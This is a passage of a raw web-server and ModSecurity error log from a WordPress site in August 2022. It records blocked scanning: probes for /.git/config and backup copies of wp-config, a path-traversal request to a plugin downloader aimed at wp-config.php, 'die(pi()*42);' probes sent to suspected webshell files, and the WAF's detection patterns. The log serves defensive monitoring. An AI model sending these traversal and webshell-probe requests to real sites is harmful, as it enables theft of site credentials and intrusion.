"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/index3.php"] [unique_id "YvSchrV-zqU5XsNb7agtFgAAAIw"] [Fri Aug 12 03:52:12.128727 2022] [autoindex:error] [pid 21428:tid 140091666151168] [client 85.31.46.140:33904] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 12 11:53:06.533043 2022] [:error] [pid 21428:tid 140091853596416] [client 178.159.37.54:45416] [client 178.159.37.54] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "paros" at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "20"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "mozilla/5.0 (windows nt 5.1; rv:22.0) gecko/20100101 firefox/22.0 paros/3.2.13"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YvaFcq1mrgJwTDvqEsBD7wAAAME"] [Sun Aug 14 12:32:46.860362 2022] [:error] [pid 22959:tid 140295299655424] [client 213.167.224.30:40784] [client 213.167.224.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/access.log"] [unique_id "YvkxvmkQ_zUzLvtWthRBbgAAAME"] 2022/08/15 07:00:11 [error] 31951#31951: *508183 access forbidden by rule, client: 34.207.242.42, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Aug 16 08:08:35.793727 2022] [autoindex:error] [pid 2747:tid 140538846115584] [client 20.125.115.217:37504] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/08/16 08:51:46 [error] 1938#1938: *527992 access forbidden by rule, client: 18.222.64.104, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/18 23:41:49 [error] 5860#5860: *79052 access forbidden by rule, client: 18.217.111.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/18 23:41:49 [error] 5859#5859: *79053 access forbidden by rule, client: 18.217.111.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/18 23:41:49 [error] 5860#5860: *79056 access forbidden by rule, client: 18.217.111.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/08/18 23:41:49 [error] 5859#5859: *79057 access forbidden by rule, client: 18.217.111.95, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 19 10:20:52.267820 2022] [:error] [pid 7734:tid 140430792419072] [client 62.210.185.4:35592] [client 62.210.185.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Yv-qVAFAQQWgk7ARq37BEAAAAJA"] [Fri Aug 19 10:21:37.350099 2022] [:error] [pid 8400:tid 140430792419072] [client 62.210.185.4:35626] [client 62.210.185.4] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Yv-qgc6ualXOjhvKkBXShQAAANA"] [Sat Aug 20 16:21:21.342401 2022] [:error] [pid 8380:tid 139716987385600] [client 152.89.196.13:53560] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php:17 [Sat Aug 20 16:21:21.342473 2022] [:error] [pid 8380:tid 139716987385600] [client 152.89.196.13:53560] Stack trace: [Sat Aug 20 16:21:21.342483 2022] [:error] [pid 8380:tid 139716987385600] [client 152.89.196.13:53560] #0 {main} [Sat Aug 20 16:21:21.342566 2022] [:error] [pid 8380:tid 139716987385600] [client 152.89.196.13:53560] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-none.php on line 17 [Sat Aug 20 22:05:52.079674 2022] [:error] [pid 7577:tid 139717004171008] [client 20.70.190.233:32898] [client 20.70.190.233] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/fwduvp/content/downloader.php"] [unique_id "YwGhEBeCSpBKLRHlcIWVRQAAAII"], referer: www.google.com [Sat Aug 20 22:05:56.109885 2022] [:error] [pid 7577:tid 139716779251456] [client 20.70.190.233:32902] [client 20.70.190.233] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/fwduvp/content/downloader.php"] [unique_id "YwGhFBeCSpBKLRHlcIWVRgAAAJQ"], referer: www.google.com [Sat Aug 20 22:13:33.837361 2022] [:error] [pid 8380:tid 139716888356608] [client 152.89.196.13:33034] PHP Fatal error: Uncaught Error: Call to undefined function add_filter() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php:67 [Sat Aug 20 22:13:33.837442 2022] [:error] [pid 8380:tid 139716888356608] [client 152.89.196.13:33034] Stack trace: [Sat Aug 20 22:13:33.837453 2022] [:error] [pid 8380:tid 139716888356608] [client 152.89.196.13:33034] #0 {main} [Sat Aug 20 22:13:33.837529 2022] [:error] [pid 8380:tid 139716888356608] [client 152.89.196.13:33034] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-functions.php on line 67 [Sat Aug 20 22:44:09.181104 2022] [autoindex:error] [pid 8380:tid 139717020956416] [client 122.155.3.106:33700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Aug 20 23:34:31.826697 2022] [:error] [pid 8380:tid 139716854785792] [client 152.89.196.13:34774] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php:59 [Sat Aug 20 23:34:31.826782 2022] [:error] [pid 8380:tid 139716854785792] [client 152.89.196.13:34774] Stack trace: [Sat Aug 20 23:34:31.826796 2022] [:error] [pid 8380:tid 139716854785792] [client 152.89.196.13:34774] #0 {main} [Sat Aug 20 23:34:31.826985 2022] [:error] [pid 8380:tid 139716854785792] [client 152.89.196.13:34774] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/custom-header.php on line 59 [Sat Aug 20 23:47:49.816953 2022] [:error] [pid 7577:tid 139716871571200] [client 152.89.196.13:35022] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php:15 [Sat Aug 20 23:47:49.817049 2022] [:error] [pid 7577:tid 139716871571200] [client 152.89.196.13:35022] Stack trace: [Sat Aug 20 23:47:49.817061 2022] [:error] [pid 7577:tid 139716871571200] [client 152.89.196.13:35022] #0 {main} [Sat Aug 20 23:47:49.817149 2022] [:error] [pid 7577:tid 139716871571200] [client 152.89.196.13:35022] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php on line 15 [Sun Aug 21 00:18:28.251173 2022] [:error] [pid 8380:tid 139716804429568] [client 152.89.196.13:35778] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php:13 [Sun Aug 21 00:18:28.251243 2022] [:error] [pid 8380:tid 139716804429568] [client 152.89.196.13:35778] Stack trace: [Sun Aug 21 00:18:28.251253 2022] [:error] [pid 8380:tid 139716804429568] [client 152.89.196.13:35778] #0 {main} [Sun Aug 21 00:18:28.251327 2022] [:error] [pid 8380:tid 139716804429568] [client 152.89.196.13:35778] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/search.php on line 13 [Sun Aug 21 01:31:10.589141 2022] [:error] [pid 7576:tid 139717020956416] [client 152.89.196.13:38906] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2022/02/s_e.php"] [unique_id "YwHRLkiQ6saOJZJGLpFKpQAAAEA"] [Sun Aug 21 02:06:34.793687 2022] [:error] [pid 8380:tid 139716879963904] [client 152.89.196.13:45640] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php:15 [Sun Aug 21 02:06:34.793756 2022] [:error] [pid 8380:tid 139716879963904] [client 152.89.196.13:45640] Stack trace: [Sun Aug 21 02:06:34.793766 2022] [:error] [pid 8380:tid 139716879963904] [client 152.89.196.13:45640] #0 {main} [Sun Aug 21 02:06:34.793858 2022] [:error] [pid 8380:tid 139716879963904] [client 152.89.196.13:45640] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php on line 15 [Sun Aug 21 02:32:23.378472 2022] [:error] [pid 7577:tid 139716879963904] [client 152.89.196.13:49442] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php:16 [Sun Aug 21 02:32:23.378544 2022] [:error] [pid 7577:tid 139716879963904] [client 152.89.196.13:49442] Stack trace: [Sun Aug 21 02:32:23.378554 2022] [:error] [pid 7577:tid 139716879963904] [client 152.89.196.13:49442] #0 {main} [Sun Aug 21 02:32:23.378620 2022] [:error] [pid 7577:tid 139716879963904] [client 152.89.196.13:49442] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/header.php on line 16 [Sun Aug 21 02:32:25.084888 2022] [:error] [pid 7577:tid 139716821214976] [client 152.89.196.13:49452] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/menu_settings.php"] [unique_id "YwHfiReCSpBKLRHlcIWdoQAAAI8"] [Sun Aug 21 02:49:07.237034 2022] [:error] [pid 7575:tid 139716829607680] [client 152.89.196.13:50852] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php:13 [Sun Aug 21 02:49:07.237110 2022] [:error] [pid 7575:tid 139716829607680] [client 152.89.196.13:50852] Stack trace: [Sun Aug 21 02:49:07.237123 2022] [:error] [pid 7575:tid 139716829607680] [client 152.89.196.13:50852] #0 {main} [Sun Aug 21 02:49:07.237213 2022] [:error] [pid 7575:tid 139716829607680] [client 152.89.196.13:50852] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/sidebar.php on line 13 [Sun Aug 21 03:19:09.171830 2022] [:error] [pid 7577:tid 139716863178496] [client 152.89.196.13:52968] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php:13 [Sun Aug 21 03:19:09.171921 2022] [:error] [pid 7577:tid 139716863178496] [client 152.89.196.13:52968] Stack trace: [Sun Aug 21 03:19:09.171935 2022] [:error] [pid 7577:tid 139716863178496] [client 152.89.196.13:52968] #0 {main} [Sun Aug 21 03:19:09.172025 2022] [:error] [pid 7577:tid 139716863178496] [client 152.89.196.13:52968] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/single.php on line 13 [Sun Aug 21 03:55:49.605963 2022] [:error] [pid 24096:tid 140483798157056] [client 152.89.196.13:54926] PHP Fatal error: Uncaught Error: Call to undefined function post_password_required() in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php:21 [Sun Aug 21 03:55:49.606040 2022] [:error] [pid 24096:tid 140483798157056] [client 152.89.196.13:54926] Stack trace: [Sun Aug 21 03:55:49.606051 2022] [:error] [pid 24096:tid 140483798157056] [client 152.89.196.13:54926] #0 {main} [Sun Aug 21 03:55:49.606119 2022] [:error] [pid 24096:tid 140483798157056] [client 152.89.196.13:54926] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/comments.php on line 21 [Sun Aug 21 04:09:27.800652 2022] [:error] [pid 24495:tid 140483565131520] [client 152.89.196.13:55190] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php:15 [Sun Aug 21 04:09:27.800756 2022] [:error] [pid 24495:tid 140483565131520] [client 152.89.196.13:55190] Stack trace: [Sun Aug 21 04:09:27.800770 2022] [:error] [pid 24495:tid 140483565131520] [client 152.89.196.13:55190] #0 {main} [Sun Aug 21 04:09:27.800890 2022] [:error] [pid 24495:tid 140483565131520] [client 152.89.196.13:55190] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-page.php on line 15 [Sun Aug 21 04:59:42.843727 2022] [:error] [pid 24495:tid 140483523168000] [client 152.89.196.13:56406] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/qq.php"] [unique_id "YwICDj0FObUnixiW7xN2jgAAANg"] [Sun Aug 21 05:07:20.766675 2022] [:error] [pid 24095:tid 140483789764352] [client 152.89.196.13:56532] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php:15 [Sun Aug 21 05:07:20.766778 2022] [:error] [pid 24095:tid 140483789764352] [client 152.89.196.13:56532] Stack trace: [Sun Aug 21 05:07:20.766792 2022] [:error] [pid 24095:tid 140483789764352] [client 152.89.196.13:56532] #0 {main} [Sun Aug 21 05:07:20.766911 2022] [:error] [pid 24095:tid 140483789764352] [client 152.89.196.13:56532] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-image.php on line 15 [Sun Aug 21 07:07:22.564713 2022] [:error] [pid 24095:tid 140483665843968] [client 152.89.196.13:36372] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php:148 [Sun Aug 21 07:07:22.564791 2022] [:error] [pid 24095:tid 140483665843968] [client 152.89.196.13:36372] Stack trace: [Sun Aug 21 07:07:22.564801 2022] [:error] [pid 24095:tid 140483665843968] [client 152.89.196.13:36372] #0 {main} [Sun Aug 21 07:07:22.564871 2022] [:error] [pid 24095:tid 140483665843968] [client 152.89.196.13:36372] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/customizer.php on line 148 [Sun Aug 21 07:27:08.371127 2022] [:error] [pid 24495:tid 140483539953408] [client 152.89.196.13:36758] PHP Fatal error: Uncaught Error: Call to undefined function the_custom_logo() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php:15 [Sun Aug 21 07:27:08.371213 2022] [:error] [pid 24495:tid 140483539953408] [client 152.89.196.13:36758] Stack trace: [Sun Aug 21 07:27:08.371228 2022] [:error] [pid 24495:tid 140483539953408] [client 152.89.196.13:36758] #0 {main} [Sun Aug 21 07:27:08.371333 2022] [:error] [pid 24495:tid 140483539953408] [client 152.89.196.13:36758] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php on line 15 [Sun Aug 21 07:41:21.967430 2022] [autoindex:error] [pid 24095:tid 140483798157056] [client 20.14.72.59:36928] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Aug 21 07:59:49.331807 2022] [:error] [pid 24095:tid 140483665843968] [client 152.89.196.13:37254] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/ID3/menu_settings.php"] [unique_id "YwIsRWsdfSFGDncQyrQd1gAAAAc"] [Sun Aug 21 08:25:35.552035 2022] [:error] [pid 24495:tid 140483607095040] [client 152.89.196.13:37748] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/s_e.php"] [unique_id "YwIyTz0FObUnixiW7xN9EwAAAM4"] [Sun Aug 21 09:01:12.546572 2022] [:error] [pid 24095:tid 140483581916928] [client 152.89.196.13:38772] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr() in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php:13 [Sun Aug 21 09:01:12.546683 2022] [:error] [pid 24095:tid 140483581916928] [client 152.89.196.13:38772] Stack trace: [Sun Aug 21 09:01:12.546698 2022] [:error] [pid 24095:tid 140483581916928] [client 152.89.196.13:38772] #0 {main} [Sun Aug 21 09:01:12.546808 2022] [:error] [pid 24095:tid 140483581916928] [client 152.89.196.13:38772] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/searchform.php on line 13 [Sun Aug 21 09:21:10.210445 2022] [:error] [pid 24495:tid 140483573524224] [client 152.89.196.13:39472] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php:199 [Sun Aug 21 09:21:10.210514 2022] [:error] [pid 24495:tid 140483573524224] [client 152.89.196.13:39472] Stack trace: [Sun Aug 21 09:21:10.210524 2022] [:error] [pid 24495:tid 140483573524224] [client 152.89.196.13:39472] #0 {main} [Sun Aug 21 09:21:10.210613 2022] [:error] [pid 24495:tid 140483573524224] [client 152.89.196.13:39472] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/template-tags.php on line 199 [Sun Aug 21 09:34:03.537474 2022] [:error] [pid 24495:tid 140483556738816] [client 152.89.196.13:39574] PHP Fatal error: Uncaught Error: Call to undefined function get_template_part() in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php:22 [Sun Aug 21 09:34:03.537569 2022] [:error] [pid 24495:tid 140483556738816] [client 152.89.196.13:39574] Stack trace: [Sun Aug 21 09:34:03.537584 2022] [:error] [pid 24495:tid 140483556738816] [client 152.89.196.13:39574] #0 {main} [Sun Aug 21 09:34:03.537702 2022] [:error] [pid 